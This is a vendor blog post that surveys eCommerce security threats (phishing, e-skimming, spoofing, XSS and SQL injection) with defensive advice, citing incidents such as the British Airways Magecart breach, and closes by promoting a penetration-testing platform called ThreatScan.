Online retailers face numerous challenges daily—attracting customers, managing inventory, navigating the supply chain, etc. In the midst of all this, it’s very easy to forget the eCommerce cyber security threats lurking around every corner of the internet, waiting to pounce on unsuspecting merchants and customers. A massive attack by hacker group Keeper saw over 570 eCommerce stores in 55 countries compromised, leaking 184,000 credit cards and generating over $7 million from selling compromised cards [1]. The breach took place over three years till 2020. 85% of the websites used the Magento CMS, which fell victim to sophisticated attacks such as Magecart.

Whether you are thinking of making the leap to eCommerce or already have a thriving business, you must set up a detailed cyber security approach for all risks. Security must form the foundation of your site, not a layer thrown on top of it. To get you started, we’ve put together a list of the major security threats the eCommerce industry is facing and what you can do to mitigate them.

Why Cyber Security Is Essential for eCommerce 

An eCommerce site holds a wealth of information. Customers hand over personal data, such as their names, usernames, passwords, email address, and physical address, in addition to sensitive financial data like bank account details, credit/debit card information, etc. Hackers with access to all this data can sell it online on the black market or use it to commit credit card theft, identity fraud, and similar illegal practices.

Even employees cannot escape eCommerce security threats since they can become targets for cybercriminals. If the latter gains access to your network, they can slow it down or grind it to a halt until you pay a ransom. Your business thus has to safeguard workers and visitors, as well as keep up with industry standards. Any slips could result in a serious loss in revenue, reputational hit, and legal repercussions. Customer trust could also take a beating, harming you long-term.

Top eCommerce Security Threats and Solutions

Most websites share a common set of security threats, but eCommerce sites are especially at risk of attacks seeking payment information. Verizon’s 2019 Data Breach Investigations Report showed that eCommerce web application attacks rose from 5% to 64% over four years [2]. 81% of threat actors were external and 19% were internal. 81% of breaches involved web applications, privilege misuse, and miscellaneous errors. Of the data compromised, 64% was payments related, 20% was credentials related, and 16% was personal. 

Keeping this in mind, here are some of the critical threats you’ll have to watch out for: 

Phishing

You’ve probably heard about phishing or its types, such as vishing, smishing, and spear phishing. It’s become increasingly common as a low-cost, high-gain attack that requires minimal resources on the criminal’s part. Phishing usually involves a fraudulent email or text message that wants you to click on a link or fill up a form. The perpetrator may not know your name, so they’ll send a generic greeting like ‘Hi Dear’. The subject matter appears urgent, like an expired subscription or delayed delivery. It usually looks like it’s coming from an official source with authentic-looking branding or even an internal company email.

You must train your employees on how to identify phishing attacks. For instance, hovering over a link to check whether the URL is correct. When visiting a website through a link, check whether the domain name is correct. Never fill up forms on sites you are unsure of.

E-skimming

In an e-skimming attack, cybercriminals insert skimming code onto eCommerce payment pages to steal credit card info and personally identifiable data by sending all the inputted data to their server or domain. British Airways faced a major e-skimming attack in 2018 when hackers stole the credit card credentials of over 350,000 customers [3]. They used Magecart to carry out the attack, copying the JavaScript payment forms on the British Airways site. They also breached the airline’s mobile app.

E-skimmers typically utilise phishing or brute force to break into your network. They could also exploit a vulnerability on your platform. To identify e-skimming attacks, check whether your JavaScript has been edited, a new domain appears that you did not register, or customers are complaining to you about fraudulent activities in their accounts.

To reduce the risk of an e-skimming attack, follow these tips:

· Keep an eye on web logs.

· Update your anti-virus software.

· Perform code integrity checks.

· Install updates and patches from payment vendors regularly.

· Complete your PCI DSS compliance.

· Limit network exposure by implementing network separation.

If you do get hit by an e-skimming attack, you should first and foremost identify the source of the skimming code so you can find out where the attackers are accessing data from—network, third party, etc. Change all your credentials so hackers can’t re-enter. Lastly, note down all the breach details, such as the skimming script or malicious domain. You can hand these over to the police in case of an investigation.

Spoofing

Just as the name suggests, a spoofing attack involves building a replica of your website using your brand logo, home page layout, etc. Visitors may not be able to tell the difference, especially if the domain name is close to your own. They may enter all kinds of sensitive information such as credit card data, usernames, passwords, birthdays, mobile numbers, email IDs, etc. The spoofed site could even trick you into downloading malware that will infect your device directly. It’s all part of a well-oiled social engineering attack, in which the aim is to draw a person in and fool them into revealing information.

Keep an eye out for spoofed sites and immediately take action if a user reports a cloned website. To help customers distinguish your site from the fake one, ensure you have an SSL certificate and HTTPS encryption. Browsers will then display a green padlock next to your URL in the address bar.

XSS Attacks

Attackers can manipulate your site’s code in a cross-site scripting (XSS) injection attack, and you may not even know it because, in most cases, the site continues to function as usual. Cybercriminals insert their malicious script into your web application to send it to customers when they interact with your site. The visitor’s browser will execute the script thinking it is legitimate. Because of this trickery, the script can gain a hold of session tokens, cookies, and any other data collected and stored by the browser. The script may even rewrite your site’s content and lead to account impersonation.

Because of their hidden nature, vulnerabilities that lead to XSS attacks can be tough to spot and eliminate from your web app. You will have to conduct a thorough security review of your code. Investigate any places where inputs from an HTTP request could translate into HTML content.

SQL Injection Attacks

Structured query language (SQL) injection is another insertion-type attack wherein a malicious SQL code is injected into input fields for backend database manipulation. This allows the hacker to view private site data that the public cannot see, such as usernames, credit card info, password lists, customer details, etc. They can also insert, update, or delete database data; execute admin operations; and command the OS.

Since user input fields are used in SQL injection attacks, the key to preventing one is to watch over and vet user inputs. Deploy strict input validation so that only accepted inputs can pass through. Parameterised queries should also be used so that only SQL statements that follow accepted parameters are permitted for execution. The database will recognise the code and separate it from the input data.

Shield Against Security Threats with ThreatScan

eCommerce businesses today fly high or fall flat depending on the strength of their cyber security. It cannot be left up to chance, even for small and medium-sized firms. ThreatScan is a SaaS-based vulnerability management and penetration testing platform that goes deep into your system to scan for vulnerabilities, scrutinise risks, and help perform manual pentests. You’ll get an instant threat score to see how your application and network are faring in terms of security, along with an overall organisation score and risk posture. There’s even an easy-to-understand dashboard to manage vulnerabilities, view the status of your pentest, and much more.

If you’re new to this process or feel lost, our AI-based chatbot, Diana, will help you submit, download, and reapply for tests in real-time. The AI-based chatbot will help you answer any questions related to cyber security or about the product. We are also available 24/7 to support you through the pentest journey. You’ll receive all ThreatScan notifications through email, Jira, and Slack integration, allowing you to take action quickly and communicate effectively with your team on your preferred platform.

Contact us here to begin your ThreatScan journey.

References

1. https://cio.economictimes.indiatimes.com/news/digital-security/hackers-break-into-570-e-commerce-stores-including-in-india/76866426

2. https://www.verizon.com/business/resources/reports/dbir/2019/retail/?_ga=2.207940310.534579224.1636826893-1165882268.1636826893

3. https://www.imperva.com/learn/application-security/magecart/

4. https://niccs.cisa.gov/sites/default/files/documents/pdf/ncsam_eskimming_508.pdf

5. https://www.malwarebytes.com/spoofing

6. https://owasp.org/www-community/attacks/xss/

7. https://www.ptsecurity.com/ww-en/analytics/knowledge-base/how-to-prevent-sql-injection-attacks/